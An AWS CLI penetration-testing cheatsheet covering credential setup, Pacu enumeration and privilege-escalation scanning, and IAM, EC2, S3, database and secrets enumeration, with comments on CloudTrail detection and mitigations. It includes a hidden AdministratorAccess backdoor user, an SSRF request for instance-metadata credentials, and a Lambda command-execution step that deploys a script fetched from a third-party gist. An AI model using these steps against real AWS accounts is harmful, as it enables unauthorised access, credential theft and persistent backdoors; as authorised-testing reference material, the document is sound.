
Cloud Pentest Cheatsheet - AWS CLI

 

Installation and Basic Commands
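#Install the AWS CLI v2 bundle. The archive is fetched unsigned over curl, so
#verify it against the signature AWS publishes before running the installer.
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

#Login - Enter the Access Key ID and Secret Access Key (not a "Client ID/Secret");
#they are written in plain text to ~/.aws/credentials
aws configure

#Login - Create a named profile in case you have multiple accounts
aws configure --profile Some_NAME

#Get info about the access key: account ID, principal ARN and user ID
aws sts get-caller-identity --profile Some_NAME

#Using Short Term Temp Creds - all three values are required; each placeholder
#names the value that goes on that line
aws configure set aws_access_key_id [access-key-id] --profile ec2
aws configure set aws_secret_access_key [secret-access-key] --profile ec2
aws configure set aws_session_token [session-token] --profile ec2
aws sts get-caller-identity --profile ec2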
Exploitation using PACU
#Download and Install PACU
pip3 install -U pacu

#run pacu and create a session
#(the two lines after "pacu" are answers typed at its interactive prompt -
# presumably "0" selects a new session and the next line is the session name; confirm against the prompt)
pacu
0
AWS-Pentest

#Create AWS login Session - enter Access & Secret Key
set_keys

#Enum IAM permissions of the loaded keys
exec iam__enum_permissions

#List all permissions gathered for the logged in user 
whoami

#Enum EC2 Instances
exec ec2__enum

#List all the gathered data for the EC2 service
data EC2

#Auto PrivEsc - checks the enumerated permissions for known escalation paths.
#Every module above issues real API calls, so each run is visible in CloudTrail.
exec iam__privesc_scan

Saved Credential Location 
#Windows - filename: credentials
C:\Users\Name\.aws\credentials

#Linux - filename: credentials
/home/username/.aws/credentials 
Important Things to Note 
  • If the access key ID starts with AKI, it's a long-term credential
  • If an account number is present in a policy, it's an inline / customer-created policy
Enumeration - Users
#List Users
aws iam list-users 

#check if a given user is part of any groups (group policies apply to the user too)
aws iam list-groups-for-user --user-name UserNameHere

#List managed policies (AWS-managed or customer-managed) attached directly to a user
aws iam list-attached-user-policies --user-name UserNameHere

#List inline policies embedded in the user (names only; fetch each document with get-user-policy)
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
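#List all Groups
aws iam list-groups

#List all users in a given group
aws iam get-group --group-name GroupNameHere

#List all managed policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]

#Lists the names of the inline policies embedded in the specified IAM user
aws iam list-user-policies --user-name [user-name]

#List All IAM Roles - roles are assumed by trusted principals (compute resources,
#AWS services, users, federated identities); who may assume a role is set in its trust policy
aws iam list-roles

#Lists all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [role-name]

#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [role-name]

#List all managed policies (AWS-managed and customer-managed);
#inline policies are NOT returned here - use the list-*-policies calls above for those
aws iam list-policies

#List managed policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>

#Retrieves information about the specified managed policy
#AttachmentCount = number of entities this policy is attached to
aws iam get-policy --policy-arn [policy-arn]

#Lists information about the versions of the specified managed policy
aws iam list-policy-versions --policy-arn [policy-arn]

#Retrieves the specified version of the specified managed policy
#(the active document is the version flagged IsDefaultVersion in the listing above)
aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]

#Retrieves the specified inline policy document that is embedded in the specified IAM user / group / role
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]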
Simple Cheatsheet

#List your permissions - get ARN (account ID, principal ARN and user ID of the current credentials)
aws sts get-caller-identity

#discover what else you can do, the IAM Policy Simulator is your best tool
#(the caller needs iam:SimulatePrincipalPolicy on the source principal)
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "ec2:DescribeInstances" "ec2:DescribeSubnets" "ec2:DescribeSecurityGroups"

#Check if you have any IAM permissions assigned to you 
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "iam:ListUsers" "iam:ListRoles" "iam:GetPolicy"

#List user policies (names of inline policies only)
aws iam list-user-policies --user-name UserNameHere

#Check for Inline Policies (fetch the document for a name returned by the previous command)
aws iam get-user-policy --user-name lambdazen --policy-name <policy-name-from-previous-command>

#Check for Group Membership
aws iam list-groups-for-user --user-name lambdazen

#List the group's attached policies:
aws iam list-attached-group-policies --group-name <group-name>

#List the group's inline policies:
aws iam list-group-policies --group-name <group-name>

#Check for Resource-Based Policies (a bucket policy grants access independently of the
#identity policies above; reading it needs s3:GetBucketPolicy on that bucket)
aws s3api get-bucket-policy --bucket <the-bucket-name-you-can-access>

Persistence 

# Create the new user
# Every command in this section writes to IAM and is recorded in CloudTrail as
# CreateUser / AttachUserPolicy / CreateAccessKey / CreateLoginProfile - the
# events defenders alert on for backdoor-account creation.
aws iam create-user --user-name <new-hidden-user>

# Attach the same AdministratorAccess policy
aws iam attach-user-policy --user-name <new-hidden-user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Create a new access key for your hidden user. Save this output securely.
aws iam create-access-key --user-name <new-hidden-user>

#AWS Console Access
#NOTE: a literal password on the command line lands in shell history and process listings
aws iam create-login-profile --user-name <user-name> --password "YourSuperSecureP@ssw0rd!" --password-reset-required
Enumeration - Instances & Other Services
#List all EC2 Instances in default region
#Lists Keypair name, Public/Private IP
#Try to access the Public Endpoints - try to exploit them 
#Check roles (the IamInstanceProfile field shows which role an instance can use)
aws ec2 describe-instances

#list only required details 
aws ec2 describe-instances \
  --filters "Name=instance-state-name,Values=running,stopped" \
  --query "Reservations[*].Instances[*].{Name: (Tags[?Key=='Name'].Value | [0]), Hostname: PrivateDnsName, Status: State.Name, PrivateIP: PrivateIpAddress, PublicIP: PublicIpAddress}" \
  --output table


#Example - retrieve EC2 Temp Creds if a Server is Public and is vuln to SSRF
#(this single GET only works against IMDSv1; enforcing IMDSv2 (HttpTokens=required)
# is the standard mitigation for this SSRF-to-credentials path)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
S3 Bucket

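#OSINT Enum - Find S3 Buckets (third-party tool, not part of the AWS CLI)
cloud_enum -k Bucket_Company_Name

#list all buckets owned by the current credentials
aws s3 ls

#Download Unauthenticated S3 Bucket files
#(--no-sign-request sends no credentials, so this only works on publicly readable buckets;
# copying a whole bucket needs a local destination and --recursive)
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> . --recursive --region us-east-2 --no-sign-request

#List S3 Bucket Contents
aws s3 ls s3://Bucket_name

#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/file

#List the items in a given bucket excluding mp4 files
#NOTE(review): --exclude/--include are documented for cp/sync/mv/rm; confirm your
#CLI version accepts them on `ls` before relying on this
aws s3 ls s3://bucketname/ --recursive --summarize --exclude "*.mp4"

#Exclude a directory and list
aws s3 ls s3://bucketname/ --recursive --summarize \
  --exclude "archived-logs/*" \
  --exclude "temp-uploads/*" \
  --exclude "user-avatars/*"

#Download a bucket recursively excluding a directory
aws s3 cp s3://bucketname/ . --recursive --exclude "archived-logs/*"

#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path

#Delete a file on S3 Bucket (destructive)
aws s3 rm s3://Bucket_name/file/path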
Cloudwatch 

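#Get S3 Bucket size/metrics using CloudWatch
#(date -d '2 days ago' is GNU date syntax; the substitutions are quoted so the
# timestamp cannot be word-split into extra arguments)
aws cloudwatch get-metric-statistics \
    --namespace AWS/S3 \
    --metric-name BucketSizeBytes \
    --dimensions Name=BucketName,Value=BucketNameHERE Name=StorageType,Value=StandardStorage \
    --start-time "$(date -u -d '2 days ago' +'%Y-%m-%dT%H:%M:%SZ')" \
    --end-time "$(date -u +'%Y-%m-%dT%H:%M:%SZ')" \
    --period 86400 \
    --statistics Average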
Database Enumeration

#RDS
aws rds describe-db-instances

#DynamoDB
aws dynamodb list-tables

#Redshift Clusters
aws redshift describe-clusters

#DocumentDB Clusters (served through the RDS API, engine name "docdb")
#NOTE(review): the documented option is --filters; confirm --filter is accepted as an abbreviation
aws rds describe-db-clusters --filter Name=engine,Values=docdb
Secrets Manager & Key Vault

#List secrets (metadata only - no values)
aws secretsmanager list-secrets

#Read a specific secret's value (recorded in CloudTrail as GetSecretValue)
aws secretsmanager get-secret-value --secret-id <secret-name-or-arn>


#List keys
aws kms list-keys

#Describe a given key
aws kms describe-key --key-id <key-id-or-alias-name>

#Check the Key Policy - who may use and administer the key; "default" is the only policy name KMS accepts
aws kms get-key-policy --key-id <key-id> --policy-name default
Exploit if the User has Lambda Read/Write/Invoke Permissions

Action:
  - 'Lambda:CreateFunction'
  - 'Lambda:InvokeFunction'

#List existing functions 
aws lambda list-functions

#get an existing function (the response includes a pre-signed URL to the deployment package)
aws lambda get-function --function-name <Func_Name>

#create a file named lambda_function.py
#Fetched from a third-party gist over the network; the URL is pinned to a commit,
#but read the script before deploying it under a role in the target account
wget https://gist.githubusercontent.com/Bhanunamikaze/bf121677e9ffa3b1d8bd09e90426a283/raw/b11d4942dac11ef6d00374f4b2acd2ebeafc0355/lambda_function.py

#zip the file 
zip function.zip lambda_function.py

#NOTE: this lists the user's groups, not roles; the role ARN for create-function
#below comes from `aws iam list-roles` (see the IAM enumeration section)
aws iam list-groups-for-user --user-name UserNameHere

#Create a Lambda Function
#add  --endpoint-url 'http://domain.local' if required (plain http: the request,
#including the zipped code, travels unencrypted to that endpoint)
aws lambda create-function --function-name test3 \
  --runtime python3.8 \
  --role arn:aws:iam::000000000000:role/<RoleNameHere> \
  --handler lambda_function.lambda_handler \
  --zip-file fileb://function.zip

#Create a payload file - payload.json; update the command as required
#(the function executes with the passed role's permissions; restricting who may
# pass privileged roles is the control that stops this, and both the CreateFunction
# and Invoke calls are CloudTrail events)
{"cmd": "ls"}

#invoke the function
aws lambda invoke --function-name test3 --payload fileb://payload.json output.json && cat output.json

#output of the command execution is stored in output.json file


